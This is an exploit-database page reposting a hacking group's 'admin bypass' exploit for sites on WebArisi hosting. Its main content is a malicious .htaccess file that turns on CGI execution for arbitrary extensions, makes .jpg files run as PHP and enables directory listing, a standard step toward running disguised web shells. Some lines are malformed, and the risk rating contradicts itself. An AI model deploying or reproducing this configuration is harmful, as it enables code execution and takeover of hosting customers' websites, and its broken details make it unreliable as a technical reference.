Advertisement






WebArisi Hosting Htaccess File Admin Bypass Exploit

CVE Category Price Severity
N/A CWE-264 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2018-06-21
CPE
cpe:cpe:/a:webarisi:htaccess_file_admin_bypass
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018060221

Below is a copy:

WebArisi Hosting Htaccess File Admin Bypass Exploit
#################################################################################################

# Exploit Title : WebArisi Hosting Htaccess File Admin Bypass Exploit
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 21/06/2018
# Vendor Homepage : webarisi.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ]

#################################################################################################

# Google Dork : No Dork / N/A

Find only vulnerable registered to WebArisi hosted websites.

# Exploit : [ This is .htaccess bypass file ]

Options +FollowSymLinks +Indexes
DirectoryIndex default.html 
## START ##
Options +ExecCGI
AddHandler cgi-script log cgi pl tg love h4 tgb x-zone 
AddType application/x-httpd-php .jpg
RewriteEngine on
RewriteRule (.*)\war$ .log
## END ##
ReadmeName cyberizm.txt

################################################################################################

Reference => cyberizm.org/cyberizm-webarisi-hosting-htaccess-bypass-kodlari.html

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.